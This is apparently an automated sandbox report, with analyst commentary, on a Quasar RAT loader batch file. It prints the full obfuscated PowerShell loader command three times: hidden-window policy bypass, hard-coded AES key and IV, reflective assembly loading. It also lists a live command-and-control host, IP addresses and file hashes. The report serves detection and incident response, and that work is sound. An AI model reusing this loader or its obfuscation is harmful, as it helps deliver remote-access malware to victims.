Analysis Overview
SHA256
2f878f17890e54a4592aa7b9cd78f5b8d44e0254cf85744d94590200bed8d125
Threat Level: Known bad
The file WiKxtRl.bat was found to be: Known bad. It is a batch-file wrapper around a PowerShell loader: the embedded command reads WiKxtRl.bat itself, takes the first line beginning with ':: ' (a batch comment, so cmd.exe never executes it), splits that line on '\', and for each part base64-decodes, AES-CBC/PKCS7-decrypts with a hard-coded key and IV, gunzips, and reflectively loads the result as a .NET assembly (Assembly.Load followed by EntryPoint.Invoke). Because the key and IV are literal in the command line, both embedded payloads can be recovered statically without detonation; the first is invoked with no arguments, the second with a single empty-string argument.
Malicious Activity Summary
Quasar payload
Quasar RAT
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell — launched by cmd.exe as `powershell.exe -noprofile -windowstyle hidden -ep bypass -command ...`. The script hides its sensitive method names (FromBase64String, Load, ReadAllText) by storing them reversed and rebuilding them with `'...'[-1..-N] -join ''`, which defeats naive string matching on the command line but not PowerShell Script Block Logging (Event ID 4104), where the executed script is recorded; the `-ep bypass` / `-windowstyle hidden` / `-noprofile` combination is itself a high-signal command-line detection.
Looks up external IP address via web service (ip-api.com here; api.ipify.org and freegeoip.net are also resolved in the other runs). These geolocation lookups are consistent with Quasar's host-fingerprinting on start-up, but they are also used by legitimate software, so treat them as supporting rather than standalone evidence.
Program crash
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken (SeDebugPrivilege enabled in powershell.exe). Note that the RAT runs inside the PowerShell host itself — the payload is loaded reflectively and no separate executable is dropped — so memory capture, detection and containment should target powershell.exe (PID 4408, 1520 and 864 in the three runs), not a file on disk.
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Runs ping.exe — `ping -n 10 localhost` is executed from the dropped LtYpwpn6UUqB.bat after `chcp 65001`; pinging localhost with a count is a common stand-in for a roughly ten-second sleep in batch scripts rather than network reconnaissance, and the dropped .bat is presumably a helper written by the loaded payload (confirm from the decrypted assembly).
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-14 16:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 16:07
Reported
2024-06-14 16:12
Platform
win10-20240404-en
Max time kernel
195s
Max time network
299s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WiKxtRl.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BiJkRz5NLnyrmEvcrNKNN2n/+U317Jums9TdEe+oIqA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XChExx/HLqzULqa7bNx00g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Xpngt=New-Object System.IO.MemoryStream(,$param_var); $icfSz=New-Object System.IO.MemoryStream; $ycFeS=New-Object System.IO.Compression.GZipStream($Xpngt, [IO.Compression.CompressionMode]::Decompress); $ycFeS.CopyTo($icfSz); $ycFeS.Dispose(); $Xpngt.Dispose(); $icfSz.Dispose(); $icfSz.ToArray();}function execute_function($param_var,$param2_var){ $JcJYG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ChnnI=$JcJYG.EntryPoint; $ChnnI.Invoke($null, $param2_var);}$NlJYy = 'C:\Users\Admin\AppData\Local\Temp\WiKxtRl.bat';$host.UI.RawUI.WindowTitle = $NlJYy;$FnwhD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NlJYy).Split([Environment]::NewLine);foreach ($YIwJb in $FnwhD) { if ($YIwJb.StartsWith(':: ')) { $ZiMPy=$YIwJb.Substring(3); break; }}$payloads_var=[string[]]$ZiMPy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LtYpwpn6UUqB.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
Network — the only non-geolocation connection is to runderscore00-37568.portmap.host, resolving to 193.161.193.99:37568/tcp (DE), which is the likely C2 channel; this is the one run in which that connection was observed. The hostname pattern (label plus embedded port under portmap.host) is consistent with a tunnelled/port-forwarded listener, in which case the public IP belongs to the forwarding service rather than the operator, so block and hunt on the hostname as well as the IP.
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | runderscore00-37568.portmap.host | udp |
| DE | 193.161.193.99:37568 | runderscore00-37568.portmap.host | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.131.50.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files — note C:\Users\Admin\AppData\Roaming\$sxr-Logs\06-14-~1, a date-named file under Roaming that is consistent with Quasar's keylogger log directory layout; the '$sxr-' prefix is not stock Quasar naming and suggests a modified build — confirm against the decrypted payload. The __PSScriptPolicyTest_*.ps1 file is created by PowerShell itself when it probes application-control policy and is not an artifact of the malware.
memory/4408-0-0x00000000735FE000-0x00000000735FF000-memory.dmp
memory/4408-3-0x0000000006E10000-0x0000000006E46000-memory.dmp
memory/4408-4-0x00000000735F0000-0x0000000073CDE000-memory.dmp
memory/4408-5-0x0000000007560000-0x0000000007B88000-memory.dmp
memory/4408-6-0x00000000735F0000-0x0000000073CDE000-memory.dmp
memory/4408-7-0x00000000074F0000-0x0000000007512000-memory.dmp
memory/4408-8-0x0000000007C00000-0x0000000007C66000-memory.dmp
memory/4408-9-0x0000000007E50000-0x0000000007EB6000-memory.dmp
memory/4408-10-0x0000000007EC0000-0x0000000008210000-memory.dmp
memory/4408-13-0x0000000007CB0000-0x0000000007CCC000-memory.dmp
memory/4408-14-0x00000000087C0000-0x000000000880B000-memory.dmp
memory/4408-15-0x00000000084F0000-0x0000000008566000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nmexlbii.2h2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4408-26-0x00000000735F0000-0x0000000073CDE000-memory.dmp
memory/4408-31-0x0000000009DB0000-0x000000000A428000-memory.dmp
memory/4408-32-0x0000000009530000-0x000000000954A000-memory.dmp
memory/4408-33-0x0000000009570000-0x0000000009578000-memory.dmp
memory/4408-34-0x0000000009640000-0x00000000096DC000-memory.dmp
memory/4408-35-0x0000000009750000-0x0000000009784000-memory.dmp
memory/4408-36-0x0000000009830000-0x000000000988E000-memory.dmp
memory/4408-37-0x000000000A430000-0x000000000A92E000-memory.dmp
memory/4408-38-0x0000000009970000-0x0000000009A02000-memory.dmp
memory/4408-39-0x0000000007110000-0x0000000007122000-memory.dmp
memory/4408-40-0x0000000009A10000-0x0000000009A4E000-memory.dmp
memory/4408-44-0x0000000009D80000-0x0000000009D8A000-memory.dmp
memory/4408-46-0x00000000735FE000-0x00000000735FF000-memory.dmp
memory/4408-47-0x00000000735F0000-0x0000000073CDE000-memory.dmp
memory/4408-48-0x00000000735F0000-0x0000000073CDE000-memory.dmp
memory/4408-49-0x00000000735F0000-0x0000000073CDE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\LtYpwpn6UUqB.bat
| MD5 | 97fcb5e52fd298faa4d9f2cc1072f04f |
| SHA1 | ff340234bcca20bf6adb7d3495d123271a23c419 |
| SHA256 | 3ea0e36c3f1dc14e1b8ca5a87dd7b8199b2b1e1bba5048eb5b20847826ac0607 |
| SHA512 | f9ccb47b3279ae8c82bf3fd806d64ddffba993661b0f04263c1683b6dd61963b805916ea3039936998981d2efe686904938480e439052acb314206e299badfcc |
memory/4408-63-0x00000000735F0000-0x0000000073CDE000-memory.dmp
C:\Users\Admin\AppData\Roaming\$sxr-Logs\06-14-~1
| MD5 | 05212a73717f5c10227214c901117e57 |
| SHA1 | 4350277ad82124de0b07a99ac8d82c9f947f0dbe |
| SHA256 | 68a9096ec307c2b583771cdc08fdd7165721ea668f7dab83927314af4710d35a |
| SHA512 | 1f8f094f244d490ec2b01da162ccc98968f42107a60a3cbb067846151ad78170d108dae24d51157ac6406f457ef5b049786be7620bd4c2c8fd277d8978f3da58 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-14 16:07
Reported
2024-06-14 16:12
Platform
win10v2004-20240508-en
Max time kernel
262s
Max time network
271s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Program crash — powershell.exe (PID 1520) was handled by WerFault.exe twice in this run. No connection to runderscore00-37568.portmap.host appears in this run's network table, only DNS for the geolocation services, so the crash presumably occurred before the RAT's connect loop; the behavioral1 run is the authoritative source for the C2 indicators.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3344 wrote to memory of 1520 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3344 wrote to memory of 1520 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3344 wrote to memory of 1520 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WiKxtRl.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BiJkRz5NLnyrmEvcrNKNN2n/+U317Jums9TdEe+oIqA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XChExx/HLqzULqa7bNx00g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Xpngt=New-Object System.IO.MemoryStream(,$param_var); $icfSz=New-Object System.IO.MemoryStream; $ycFeS=New-Object System.IO.Compression.GZipStream($Xpngt, [IO.Compression.CompressionMode]::Decompress); $ycFeS.CopyTo($icfSz); $ycFeS.Dispose(); $Xpngt.Dispose(); $icfSz.Dispose(); $icfSz.ToArray();}function execute_function($param_var,$param2_var){ $JcJYG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ChnnI=$JcJYG.EntryPoint; $ChnnI.Invoke($null, $param2_var);}$NlJYy = 'C:\Users\Admin\AppData\Local\Temp\WiKxtRl.bat';$host.UI.RawUI.WindowTitle = $NlJYy;$FnwhD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NlJYy).Split([Environment]::NewLine);foreach ($YIwJb in $FnwhD) { if ($YIwJb.StartsWith(':: ')) { $ZiMPy=$YIwJb.Substring(3); break; }}$payloads_var=[string[]]$ZiMPy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1520 -ip 1520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1520 -ip 1520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2700
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | freegeoip.net | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
Files
memory/1520-0-0x00000000751AE000-0x00000000751AF000-memory.dmp
memory/1520-1-0x0000000005140000-0x0000000005176000-memory.dmp
memory/1520-2-0x00000000751A0000-0x0000000075950000-memory.dmp
memory/1520-3-0x00000000057E0000-0x0000000005E08000-memory.dmp
memory/1520-4-0x0000000005E40000-0x0000000005E62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_emf5awxh.30v.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1520-6-0x0000000006050000-0x00000000060B6000-memory.dmp
memory/1520-5-0x0000000005FE0000-0x0000000006046000-memory.dmp
memory/1520-16-0x00000000060C0000-0x0000000006414000-memory.dmp
memory/1520-17-0x00000000065A0000-0x00000000065BE000-memory.dmp
memory/1520-18-0x00000000065E0000-0x000000000662C000-memory.dmp
memory/1520-19-0x0000000007DA0000-0x000000000841A000-memory.dmp
memory/1520-20-0x0000000007740000-0x000000000775A000-memory.dmp
memory/1520-21-0x0000000007770000-0x0000000007778000-memory.dmp
memory/1520-22-0x0000000007870000-0x000000000790C000-memory.dmp
memory/1520-23-0x00000000079B0000-0x00000000079E4000-memory.dmp
memory/1520-24-0x00000000079E0000-0x0000000007A3E000-memory.dmp
memory/1520-25-0x00000000089D0000-0x0000000008F74000-memory.dmp
memory/1520-26-0x0000000007B40000-0x0000000007BD2000-memory.dmp
memory/1520-27-0x0000000005420000-0x0000000005432000-memory.dmp
memory/1520-29-0x00000000751AE000-0x00000000751AF000-memory.dmp
memory/1520-30-0x00000000751A0000-0x0000000075950000-memory.dmp
memory/1520-31-0x00000000751A0000-0x0000000075950000-memory.dmp
memory/1520-33-0x00000000751A0000-0x0000000075950000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-14 16:07
Reported
2024-06-14 16:12
Platform
win11-20240508-en
Max time kernel
42s
Max time network
52s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1960 wrote to memory of 864 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1960 wrote to memory of 864 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1960 wrote to memory of 864 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WiKxtRl.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BiJkRz5NLnyrmEvcrNKNN2n/+U317Jums9TdEe+oIqA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XChExx/HLqzULqa7bNx00g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Xpngt=New-Object System.IO.MemoryStream(,$param_var); $icfSz=New-Object System.IO.MemoryStream; $ycFeS=New-Object System.IO.Compression.GZipStream($Xpngt, [IO.Compression.CompressionMode]::Decompress); $ycFeS.CopyTo($icfSz); $ycFeS.Dispose(); $Xpngt.Dispose(); $icfSz.Dispose(); $icfSz.ToArray();}function execute_function($param_var,$param2_var){ $JcJYG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ChnnI=$JcJYG.EntryPoint; $ChnnI.Invoke($null, $param2_var);}$NlJYy = 'C:\Users\Admin\AppData\Local\Temp\WiKxtRl.bat';$host.UI.RawUI.WindowTitle = $NlJYy;$FnwhD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NlJYy).Split([Environment]::NewLine);foreach ($YIwJb in $FnwhD) { if ($YIwJb.StartsWith(':: ')) { $ZiMPy=$YIwJb.Substring(3); break; }}$payloads_var=[string[]]$ZiMPy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | freegeoip.net | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
Files
memory/864-0-0x00000000743DE000-0x00000000743DF000-memory.dmp
memory/864-1-0x00000000048F0000-0x0000000004926000-memory.dmp
memory/864-2-0x0000000005010000-0x000000000563A000-memory.dmp
memory/864-3-0x00000000743D0000-0x0000000074B81000-memory.dmp
memory/864-4-0x00000000743D0000-0x0000000074B81000-memory.dmp
memory/864-5-0x0000000004EB0000-0x0000000004ED2000-memory.dmp
memory/864-6-0x00000000056B0000-0x0000000005716000-memory.dmp
memory/864-7-0x0000000005720000-0x0000000005786000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mn0x0x2e.eml.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/864-16-0x0000000005790000-0x0000000005AE7000-memory.dmp
memory/864-17-0x0000000005C90000-0x0000000005CAE000-memory.dmp
memory/864-18-0x0000000005CC0000-0x0000000005D0C000-memory.dmp
memory/864-19-0x0000000007480000-0x0000000007AFA000-memory.dmp
memory/864-20-0x0000000006E00000-0x0000000006E1A000-memory.dmp
memory/864-21-0x0000000006E40000-0x0000000006E48000-memory.dmp
memory/864-22-0x0000000006F20000-0x0000000006FBC000-memory.dmp
memory/864-23-0x0000000007050000-0x0000000007084000-memory.dmp
memory/864-24-0x0000000007080000-0x00000000070DE000-memory.dmp
memory/864-25-0x00000000080B0000-0x0000000008656000-memory.dmp
memory/864-26-0x0000000007200000-0x0000000007292000-memory.dmp
memory/864-27-0x0000000004BD0000-0x0000000004BE2000-memory.dmp
memory/864-29-0x00000000743DE000-0x00000000743DF000-memory.dmp
memory/864-30-0x00000000743D0000-0x0000000074B81000-memory.dmp
memory/864-31-0x00000000743D0000-0x0000000074B81000-memory.dmp
memory/864-33-0x0000000007CB0000-0x0000000007CBA000-memory.dmp
memory/864-34-0x00000000743D0000-0x0000000074B81000-memory.dmp
memory/864-37-0x00000000743D0000-0x0000000074B81000-memory.dmp